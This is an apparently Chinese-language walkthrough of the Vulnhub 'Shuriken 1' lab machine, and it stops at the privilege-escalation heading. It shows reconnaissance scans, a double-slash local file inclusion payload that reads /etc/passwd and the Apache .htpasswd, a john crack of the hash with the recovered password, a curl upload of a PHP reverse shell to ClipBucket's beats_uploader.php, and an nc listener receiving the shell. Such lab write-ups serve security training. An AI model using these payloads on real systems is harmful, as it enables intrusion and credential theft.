1. 程式人生 > 其它 >Vulnhub之Shuriken 1靶機測試過程(部分)

Vulnhub之Shuriken 1靶機測試過程(部分)

Shuriken 1

識別目標主機IP地址

──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.163.0/16   |   Screen View: Unique Hosts                                                       
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:1b:5b:15      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.238  08:00:27:08:ec:f1      1      60  PCS Systemtechnik GmbH      

利用Kali Linux自帶的netdiscover工具識別目標主機的IP地址為192.168.56.238

NMAP掃描

┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.238 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-29 06:10 EST
Nmap scan report for bogon (192.168.56.238)
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE    SERVICE    VERSION
80/tcp   open     http       Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Shuriken
|_http-server-header: Apache/2.4.29 (Ubuntu)
8080/tcp filtered http-proxy
MAC Address: 08:00:27:08:EC:F1 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.17 seconds

NMAP掃描結果表明目標主機有1個開放埠80(HTTP)

Get Access

┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ nikto -h http://192.168.56.238                                                                       
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.238
+ Target Hostname:    192.168.56.238
+ Target Port:        80
+ Start Time:         2022-11-29 06:16:18 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /secret/: Directory indexing found.
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.
+ 7916 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2022-11-29 06:17:09 (GMT-5) (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

發現了/secret/以及/login.html

──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ curl http://192.168.56.238/secret/      
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /secret</title>
 </head>
 <body>
<h1>Index of /secret</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="secret.png">secret.png</a></td><td align="right">2020-10-04 16:55  </td><td align="right">202K</td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.238 Port 80</address>
</body></html>

將圖片下載到Kali Linux本地:

┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ wget http://192.168.56.238/secret/secret.png
--2022-11-29 06:19:14--  http://192.168.56.238/secret/secret.png
Connecting to 192.168.56.238:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207283 (202K) [image/png]
Saving to: ‘secret.png’

secret.png                      100%[====================================================>] 202.42K  --.-KB/s    in 0.002s  

2022-11-29 06:19:14 (79.3 MB/s) - ‘secret.png’ saved [207283/207283]

                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ ls
nmap_full_scan  secret.png
                                    

掃描一下有無其他目錄或者檔案:

┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ gobuster dir -u http://192.168.56.238 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.238
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/29 06:20:58 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.238/img/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.238/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.238/js/]
/secret               (Status: 301) [Size: 317] [--> http://192.168.56.238/secret/]
/server-status        (Status: 403) [Size: 279]
Progress: 217532 / 220561 (98.63%)===============================================================
2022/11/29 06:21:28 Finished

沒有掃描出更有價值的目錄,而/secret.png的圖片文字是javascript,作者提示我們應該與javascript程式碼有關,仔細看首頁index.php中有兩個js程式碼,


	<script src="/js/index__7ed54732.js"></script>
	<script src="/js/index__d8338055.js"></script>

其中第一個程式碼將其放到線上JS程式碼格式化網站,這樣看起來更加方便:

https://www.qianbo.com.cn/Tool/Beautify/Js-Formatter.html

將JS程式碼格式化以後為:

! function(a, e) {
	for (var t in e) a[t] = e[t]
}(window, function(a) {
	var e = {};

	function t(n) {
		if (e[n]) return e[n].exports;
		var s = e[n] = {
			i: n,
			l: !1,
			exports: {}
		};
		return a[n].call(s.exports, s, s.exports, t), s.l = !0, s.exports
	}
	return t.m = a, t.c = e, t.d = function(a, e, n) {
		t.o(a, e) || Object.defineProperty(a, e, {
			enumerable: !0,
			get: n
		})
	}, t.r = function(a) {
		"undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(a, Symbol.toStringTag, {
			value: "Module"
		}), Object.defineProperty(a, "__esModule", {
			value: !0
		})
	}, t.t = function(a, e) {
		if (1 & e && (a = t(a)), 8 & e) return a;
		if (4 & e && "object" == typeof a && a && a.__esModule) return a;
		var n = Object.create(null);
		if (t.r(n), Object.defineProperty(n, "default", {
			enumerable: !0,
			value: a
		}), 2 & e && "string" != typeof a)
			for (var s in a) t.d(n, s, function(e) {
				return a[e]
			}.bind(null, s));
		return n
	}, t.n = function(a) {
		var e = a && a.__esModule ? function() {
			return a.default
		} : function() {
			return a
		};
		return t.d(e, "a", e), e
	}, t.o = function(a, e) {
		return Object.prototype.hasOwnProperty.call(a, e)
	}, t.p = "http://broadcast.shuriken.local", t(t.s = 0)
}({
	0: function(a, e, t) {
		a.exports = t("WdQY")
	},
	WdQY: function(a, e, t) {
		"use strict";

		function n(a, e, t) {
			return e in a ? Object.defineProperty(a, e, {
				value: t,
				enumerable: !0,
				configurable: !0,
				writable: !0
			}) : a[e] = t, a
		}
		t.r(e);
		var s = t("kiQV");

		function l(a) {
			var e = a.host,
				t = a.chatAlias,
				n = a.callbackAlias,
				s = a.lang;
			return fetch(function(a) {
					var e = a.host,
						t = a.chatAlias,
						n = void 0 === t ? "" : t,
						s = a.callbackAlias,
						l = void 0 === s ? "" : s,
						i = a.lang,
						c = void 0 === i ? "pl-PL" : i;
					return "".concat(void 0 === e ? "http://broadcast.shuriken.local" : e)
						.concat("/", "?_alias=")
						.concat(n, "&_callbackAlias=")
						.concat(l, "&_lang=")
						.concat(c)
				}({
					host: e,
					chatAlias: t,
					callbackAlias: n,
					lang: s
				}))
				.then((function(a) {
					return a.json()
				}))
				.then((function(a) {
					return {
						chatAgentsAvailable: a.agents > 0,
						callbackAsapAgentsAvailable: a.callbackAsapAgentsAvailable > 0,
						callbackScheduleAgentsAvailable: a.callbackScheduleAgentsAvailable > 0
					}
				}))
		}
		t.d(e, "INTERVAL_TIME", (function() {
			return i
		})), t.d(e, "default", (function() {
			return r
		}));
		var i = 5e3,
			c = function() {},
			r = function a() {
				var e = this;
				! function(a, e) {
					if (!(a instanceof e)) throw new TypeError("Cannot call a class as a function")
				}(this, a), n(this, "clearInterval", (function() {
					e.agentsAvailabilityCheckInterval && (clearInterval(e.agentsAvailabilityCheckInterval), e.agentsAvailabilityCheckInterval = null)
				})), n(this, "checkAgentsAvailability", (function() {
					l({
							host: e.host,
							chatAlias: e.chatAlias,
							callbackAlias: e.callbackAlias,
							lang: e.lang
						})
						.then(e.updateAgentsStatus)
				})), n(this, "startAgentsAvailabilityChecker", (function(a) {
					var t = a.host,
						n = a.chatAlias,
						s = a.callbackAlias,
						c = a.lang,
						r = void 0 === c ? "pl-PL" : c;
					e.callbackAlias = s, e.chatAlias = n, e.host = t, e.lang = r, e.clearInterval(), l({
							host: t,
							chatAlias: n,
							callbackAlias: s,
							lang: r
						})
						.then(e.updateAgentsStatus), e.agentsAvailabilityCheckInterval = setInterval(e.checkAgentsAvailability, i)
				})), n(this, "registerFunctions", (function(a) {
					var t = a.startGenesysSession,
						n = void 0 === t ? e.startGenesysSession : t,
						s = a.endGenesysSession,
						l = void 0 === s ? e.endGenesysSession : s;
					e.startGenesysSession = n, e.endGenesysSession = l
				})), n(this, "startChatSession", (function() {
					e.startGenesysSession(), e.chatInProgress = !0
				})), n(this, "updateMedaliaScenario", (function(a) {
					e.medaliaScenario = a
				})), n(this, "updateAgentsStatus", (function(a) {
					var t = a.chatAgentsAvailable,
						n = a.callbackAsapAgentsAvailable,
						s = a.callbackScheduleAgentsAvailable;
					e.chatAgentsAvailable = t, e.callbackAsapAgentsAvailable = n, e.callbackScheduleAgentsAvailable = s
				})), n(this, "quitChatSession", (function() {
					e.endGenesysSession(), e.chatInProgress = !1
				})), this.agentsAvailabilityCheckInterval = null, this.callbackAlias = "", this.callbackAsapAgentsAvailable = !1, this.callbackScheduleAgentsAvailable = !1, this.chatAgentsAvailable = !1, this.chatAlias = "", this.chatInProgress = !1, this.endGenesysSession = c, this.host = "", this.lang = "pl-PL", this.medaliaScenario = "", this.startGenesysSession = c
			};
		window.opbox.services.register({
			serviceName: s.a
		}, r)
	},
	kiQV: function(a) {
		a.exports = JSON.parse('{"a":"opbox-customer-chat-service"}')
	}
}));
//# sourceMappingURL=index_7ed54732.js.map

發現了主機名:broadcast.shuriken.local

將其加入到/etc/hosts檔案中

┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ sudo vim /etc/hosts                                        
[sudo] password for kali: 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ cat /etc/hosts                    
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.238  broadcast.shuriken.local

訪問http://broadcast.shuriken.local,彈出使用者認證框,為basic認證

檢視另一個JS程式碼,發現了一個URL:

http://shuriken.local/index.php?referer=

訪問該url,似乎這是檔案包含,但是與以往的本地檔案包含不同,需要兩個/

view-source:http://shuriken.local/index.php?referer=..//..//..//..//etc/passwd

從而得到/etc/passwd檔案的內容:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
lightdm:x:106:113:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:107:117::/nonexistent:/bin/false
kernoops:x:108:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
pulse:x:109:119:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:110:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
hplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false
server-management:x:1000:1000:server-management,,,:/home/server-management:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
mysql:x:112:123:MySQL Server,,,:/nonexistent:/bin/false

HTTP basic認證密碼放在.htpasswd,繼續用本地檔案包含:

http://shuriken.local/index.php?referer=..//..//..//..//..//..//etc//apache2//.htpasswd

在返回頁面原始碼中有.htpasswd內容

developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0

用john工具破解:

──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ echo 'developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0' > hashes
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
9972761drmfsls   (developers)     
1g 0:00:00:09 DONE (2022-11-29 06:54) 0.1013g/s 218961p/s 218961c/s 218961C/s 9982..99686420
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

從而登入HTTP基本認證,成功登入以後,可知目標執行:ClipBucket

查一下相關漏洞:

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ searchsploit clipbucket             
-------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                              |  Path
-------------------------------------------------------------------------------------------- ---------------------------------
ClipBucket - 'beats_uploader' Arbitrary File Upload (Metasploit)                            | php/webapps/44346.rb
Clipbucket 1.7 - 'dwnld.php' Directory Traversal                                            | php/webapps/32802.txt
Clipbucket 1.7.1 - Multiple SQL Injections                                                  | php/webapps/34694.txt
Clipbucket 2.4 RC2 645 - SQL Injection                                                      | php/webapps/17325.py
Clipbucket 2.5 - Blind SQL Injection                                                        | php/webapps/20708.txt
Clipbucket 2.5 - Cross-Site Request Forgery                                                 | php/webapps/20666.html
Clipbucket 2.5 - Directory Traversal                                                        | php/webapps/20704.txt
Clipbucket 2.6 - 'channels.php?cat' Cross-Site Scripting                                    | php/webapps/36524.txt
Clipbucket 2.6 - 'channels.php?time' SQL Injection                                          | php/webapps/36532.txt
Clipbucket 2.6 - 'collections.php?cat' Cross-Site Scripting                                 | php/webapps/36525.txt
Clipbucket 2.6 - 'groups.php?cat' Cross-Site Scripting                                      | php/webapps/36526.txt
Clipbucket 2.6 - 'search_result.php?query' Cross-Site Scripting                             | php/webapps/36527.txt
Clipbucket 2.6 - 'videos.php?cat' Cross-Site Scripting                                      | php/webapps/36528.txt
Clipbucket 2.6 - 'videos.php?time' SQL Injection                                            | php/webapps/36531.txt
Clipbucket 2.6 - 'view_collection.php?type' Cross-Site Scripting                            | php/webapps/36529.txt
Clipbucket 2.6 - 'view_item.php?type' Cross-Site Scripting                                  | php/webapps/36530.txt
Clipbucket 2.6 - Multiple Vulnerabilities                                                   | php/webapps/18341.txt
Clipbucket 2.6 Revision 738 - Multiple SQL Injections                                       | php/webapps/23252.txt
Clipbucket 2.7 RC3 0.9 - Blind SQL Injection                                                | php/webapps/36156.txt
ClipBucket 2.8 - 'id' SQL Injection                                                         | php/webapps/45688.txt
ClipBucket 2.8.3 - Multiple Vulnerabilities                                                 | php/webapps/42457.txt
ClipBucket 2.8.3 - Remote Code Execution                                                    | php/webapps/42954.py
ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection         | php/webapps/44250.txt
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ searchsploit -m php/webapps/44250.txt
  Exploit: ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection
      URL: https://www.exploit-db.com/exploits/44250
     Path: /usr/share/exploitdb/exploits/php/webapps/44250.txt
File Type: ASCII text

Copied to: /home/kali/Vulnhub/Shuriken_1/44250.txt


利用任意檔案上傳漏洞將php shell上傳至目標主機:

──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ curl -F "[email protected]" -F "plupload=1" -F "name=rshell.php" \
"http://broadcast.shuriken.local/actions/beats_uploader.php" -u developers:9972761drmfsls
creating file{"success":"yes","file_name":"1669723866241fca","extension":"php","file_directory":"CB_BEATS_UPLOAD_DIR"}
http://broadcast.shuriken.local/actions/CB_BEATS_UPLOAD_DIR/
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.238] 55712
Linux shuriken 5.4.0-47-generic #51~18.04.1-Ubuntu SMP Sat Sep 5 14:35:50 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 13:14:22 up  1:08,  0 users,  load average: 0.00, 0.00, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ 

提權